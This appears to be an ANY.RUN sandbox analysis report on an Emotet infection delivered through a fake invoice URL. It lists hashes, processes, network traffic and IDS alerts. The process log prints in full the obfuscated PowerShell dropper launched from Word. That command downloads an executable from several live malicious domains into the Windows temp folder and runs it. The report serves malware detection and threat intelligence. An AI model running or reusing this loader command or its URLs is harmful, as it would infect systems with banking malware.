analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
URL:

http://hongcheng.org.hk/llc/New_invoice/88982804151066/

Full analysis: https://app.any.run/tasks/c0b010d1-c213-48c8-b522-79e996a540a3
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: February 18, 2019, 16:44:46
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
opendir
loader
emotet
Indicators:
MD5:

39885088D301A90D898063E96795137B

SHA1:

44ECA96B2B8409305D6C81DEF70D6FEB3C2C5EFA

SHA256:

C57C5D94729FC6F836498A4C23577FFE0CA706B5F61E2E76A51BD2B42CE3CAC6

SSDEEP:

3:N1KWK2GSLCLcSIwASnXNN7eTTK:CWbeLciXn7MG

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 1540)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 1540)
    • Executes PowerShell scripts

      • cmd.exe (PID: 316)
    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 2660)
    • Application was dropped or rewritten from another process

      • 195.exe (PID: 4044)
      • wabmetagen.exe (PID: 2388)
      • 195.exe (PID: 3088)
      • wabmetagen.exe (PID: 2320)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2660)
    • Emotet process was detected

      • wabmetagen.exe (PID: 2388)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • chrome.exe (PID: 2728)
      • WINWORD.EXE (PID: 1540)
    • Application launched itself

      • WINWORD.EXE (PID: 1540)
      • 195.exe (PID: 4044)
    • Creates files in the user directory

      • powershell.exe (PID: 2660)
    • Creates files in the Windows directory

      • powershell.exe (PID: 2660)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 2660)
      • 195.exe (PID: 3088)
    • Starts itself from another location

      • 195.exe (PID: 3088)
  • INFO

    • Creates files in the user directory

      • chrome.exe (PID: 2728)
      • WINWORD.EXE (PID: 1540)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 1540)
      • WINWORD.EXE (PID: 3100)
    • Application launched itself

      • chrome.exe (PID: 2728)
    • Reads Internet Cache Settings

      • chrome.exe (PID: 2728)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
46
Monitored processes
16
Malicious processes
7
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start chrome.exe chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs chrome.exe no specs winword.exe no specs winword.exe no specs cmd.exe no specs powershell.exe chrome.exe no specs 195.exe no specs 195.exe #EMOTET wabmetagen.exe no specs wabmetagen.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2728"C:\Program Files\Google\Chrome\Application\chrome.exe" http://hongcheng.org.hk/llc/New_invoice/88982804151066/C:\Program Files\Google\Chrome\Application\chrome.exe
explorer.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
68.0.3440.106
3592"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win32 --annotation=prod=Chrome --annotation=ver=68.0.3440.106 --initial-client-data=0x78,0x7c,0x80,0x74,0x84,0x6f6000b0,0x6f6000c0,0x6f6000ccC:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
68.0.3440.106
2820"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=watcher --main-thread-id=2732 --on-initialized-event-handle=304 --parent-handle=308 /prefetch:6C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Version:
68.0.3440.106
3952"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=972,1112433181398300262,13346142530850764726,131072 --enable-features=PasswordImport --gpu-preferences=KAAAAAAAAACAAwBAAQAAAAAAAAAAAGAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --service-request-channel-token=33FF2C0AC3CCF2B4F5A9F9DE1C426F58 --mojo-platform-channel-handle=1000 --ignored=" --type=renderer " /prefetch:2C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Version:
68.0.3440.106
2412"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=972,1112433181398300262,13346142530850764726,131072 --enable-features=PasswordImport --service-pipe-token=587870EDE714DF2DF9DDF8B0C0206D68 --lang=en-US --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=587870EDE714DF2DF9DDF8B0C0206D68 --renderer-client-id=4 --mojo-platform-channel-handle=1908 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Version:
68.0.3440.106
3380"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=972,1112433181398300262,13346142530850764726,131072 --enable-features=PasswordImport --service-pipe-token=02DBA480D340FA215A8D5DC114AEBCDF --lang=en-US --extension-process --enable-offline-auto-reload --enable-offline-auto-reload-visible-only --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --service-request-channel-token=02DBA480D340FA215A8D5DC114AEBCDF --renderer-client-id=3 --mojo-platform-channel-handle=2156 /prefetch:1C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
LOW
Description:
Google Chrome
Exit code:
0
Version:
68.0.3440.106
3836"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=972,1112433181398300262,13346142530850764726,131072 --enable-features=PasswordImport --disable-gpu-sandbox --gpu-preferences=KAAAAAAAAACAAwBAAQAAAAAAAAAAAGAAEAAAAAAAAAAAAAAAAAAAACgAAAAEAAAAIAAAAAAAAAAoAAAAAAAAADAAAAAAAAAAOAAAAAAAAAAQAAAAAAAAAAAAAAAKAAAAEAAAAAAAAAAAAAAACwAAABAAAAAAAAAAAQAAAAoAAAAQAAAAAAAAAAEAAAALAAAA --service-request-channel-token=00C52F2BFE3401A0E9FBC85D0BEB4C72 --mojo-platform-channel-handle=3460 /prefetch:2C:\Program Files\Google\Chrome\Application\chrome.exechrome.exe
User:
admin
Company:
Google Inc.
Integrity Level:
MEDIUM
Description:
Google Chrome
Exit code:
0
Version:
68.0.3440.106
1540"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Downloads\INSTR4646490489495.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEchrome.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3100"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /EmbeddingC:\Program Files\Microsoft Office\Office14\WINWORD.EXEWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
316c:\windows\system32\cmd /c set _xxx=p&& set _yyy=owersh&& set _zzz=ell&& call %_xxx%%_yyy%%_zzz% $K5My4u = '$DrGHIly0c = new-obj0-10361093520ect -com0-10361093520obj0-10361093520ect wsc0-10361093520ript.she0-10361093520ll;$vh576j = new-object sys0-10361093520tem.net.web0-10361093520client;$xjFdD5Yz = new-object random;$GLC65c = \"0-10361093520h0-10361093520t0-10361093520t0-10361093520p0-10361093520://ishqekamil.com/ciY34zeKn3d,0-10361093520h0-10361093520t0-10361093520t0-10361093520p0-10361093520://cvlancer.com/CWvd8iMnLfj9C,0-10361093520h0-10361093520t0-10361093520t0-10361093520p0-10361093520://aucklandluxuryrealestatelistings.com/pHXewgm3qzll_3L,0-10361093520h0-10361093520t0-10361093520t0-10361093520p0-10361093520://nosomosgenios.com/cCZThGY1_wVKtkj23V,0-10361093520h0-10361093520t0-10361093520t0-10361093520p0-10361093520://2647403-1.web-hosting.es/blMc65Xgegv_YFDyjpRH\".spl0-10361093520it(\",\");$AvhcBOm = $xjFdD5Yz.nex0-10361093520t(1, 65536);$jauHDgE9o = \"c:\win0-10361093520dows\tem0-10361093520p\195.ex0-10361093520e\";for0-10361093520each($SGKszWC in $GLC65c){try{$vh576j.dow0-10361093520nlo0-10361093520adf0-10361093520ile($SGKszWC.ToS0-10361093520tring(), $jauHDgE9o);sta0-10361093520rt-pro0-10361093520cess $jauHDgE9o;break;}catch{}}'.replace('0-10361093520', $gZLbtF);$vaWgt0dZG = '';iex($K5My4u);c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Total events
2 992
Read events
2 462
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
16
Text files
56
Unknown types
5

Dropped files

PID
Process
Filename
Type
2728chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\6b01bbe3-bb4f-42c5-b8c7-1875e44c0003.tmp
MD5:
SHA256:
2728chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB\000016.dbtmp
MD5:
SHA256:
2728chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\000016.dbtmp
MD5:
SHA256:
2728chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\41e817cc-20c9-484d-ac82-10a8ec578599.tmp
MD5:
SHA256:
2728chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG.oldtext
MD5:92BE6B127E72365885AD4C3FB6534EE2
SHA256:54302A2573ACC775720E7DB0AD85873276713302B4F72596A8DCC44B01C70E51
2728chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\data_reduction_proxy_leveldb\LOG.old~RF19934d.TMPtext
MD5:92BE6B127E72365885AD4C3FB6534EE2
SHA256:54302A2573ACC775720E7DB0AD85873276713302B4F72596A8DCC44B01C70E51
2728chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\Database\LOG.oldtext
MD5:1AA66EFDB743FB0A8DCC1CD79B0B6542
SHA256:28D56532CCED7375A2A1C7731E57C1A1C2EC1AC9827F3E5BEEE7F8069A5F87DD
2728chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Last Versiontext
MD5:C10EBD4DB49249EFC8D112B2920D5F73
SHA256:90A1B994CAFE902F22A88A22C0B6CC9CB5B974BF20F8964406DD7D6C9B8867D1
2728chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB\LOG.oldtext
MD5:197882774A7ECEC9046BC48F63189B66
SHA256:27377B0D5F989997C2C3F74ACF163EED44B60631DDAA768F6655D7BE555742B2
3592chrome.exeC:\Users\admin\AppData\Local\Google\Chrome\User Data\CrashpadMetrics.pmabinary
MD5:B59113C2DCD2D346F31A64F231162ADA
SHA256:1D97C69AEA85D3B06787458EA47576B192CE5C5DB9940E5EAA514FF977CE2DC2
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
12
TCP/UDP connections
17
DNS requests
6
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2728
chrome.exe
GET
200
202.155.223.18:80
http://hongcheng.org.hk/llc/New_invoice/
HK
html
294 b
malicious
2728
chrome.exe
GET
200
202.155.223.18:80
http://hongcheng.org.hk/llc/
HK
html
260 b
malicious
2728
chrome.exe
GET
404
202.155.223.18:80
http://hongcheng.org.hk/favicon.ico
HK
html
328 b
malicious
2728
chrome.exe
GET
200
202.155.223.18:80
http://hongcheng.org.hk/llc/New_invoice/88982804151066/rMFQN-PSnss_ZUbTCmH-Vz/.1717f1c5c3317af823996bf9043bfc0ba199b3bb
HK
text
37 b
malicious
2728
chrome.exe
GET
200
202.155.223.18:80
http://hongcheng.org.hk/llc/New_invoice/88982804151066/rMFQN-PSnss_ZUbTCmH-Vz/
HK
html
559 b
malicious
2728
chrome.exe
GET
200
202.155.223.18:80
http://hongcheng.org.hk/llc/New_invoice/88982804151066/
HK
html
352 b
malicious
2728
chrome.exe
GET
200
202.155.223.18:80
http://hongcheng.org.hk/llc/New_invoice/88982804151066/rMFQN-PSnss_ZUbTCmH-Vz/index.php.suspected
HK
document
267 Kb
malicious
2660
powershell.exe
GET
200
162.144.57.226:80
http://ishqekamil.com/ciY34zeKn3d/
US
executable
152 Kb
suspicious
2660
powershell.exe
GET
301
162.144.57.226:80
http://ishqekamil.com/ciY34zeKn3d
US
html
358 b
suspicious
2728
chrome.exe
GET
200
202.155.223.18:80
http://hongcheng.org.hk/llc/New_invoice/88982804151066/
HK
html
352 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
2728
chrome.exe
216.58.206.3:443
clientservices.googleapis.com
Google Inc.
US
whitelisted
2728
chrome.exe
202.155.223.18:80
hongcheng.org.hk
WTT HK Limited
HK
malicious
2728
chrome.exe
172.217.22.99:443
www.gstatic.com
Google Inc.
US
whitelisted
2728
chrome.exe
172.217.18.99:443
ssl.gstatic.com
Google Inc.
US
whitelisted
2728
chrome.exe
216.58.207.45:443
accounts.google.com
Google Inc.
US
whitelisted
2660
powershell.exe
162.144.57.226:80
ishqekamil.com
Unified Layer
US
suspicious

DNS requests

Domain
IP
Reputation
clientservices.googleapis.com
  • 216.58.206.3
whitelisted
hongcheng.org.hk
  • 202.155.223.18
malicious
www.gstatic.com
  • 172.217.22.99
whitelisted
accounts.google.com
  • 216.58.207.45
shared
ssl.gstatic.com
  • 172.217.18.99
whitelisted
ishqekamil.com
  • 162.144.57.226
suspicious

Threats

PID
Process
Class
Message
2728
chrome.exe
Misc activity
SUSPICIOUS [PTsecurity] Download DOC file with VBAScript
2660
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2660
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2660
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info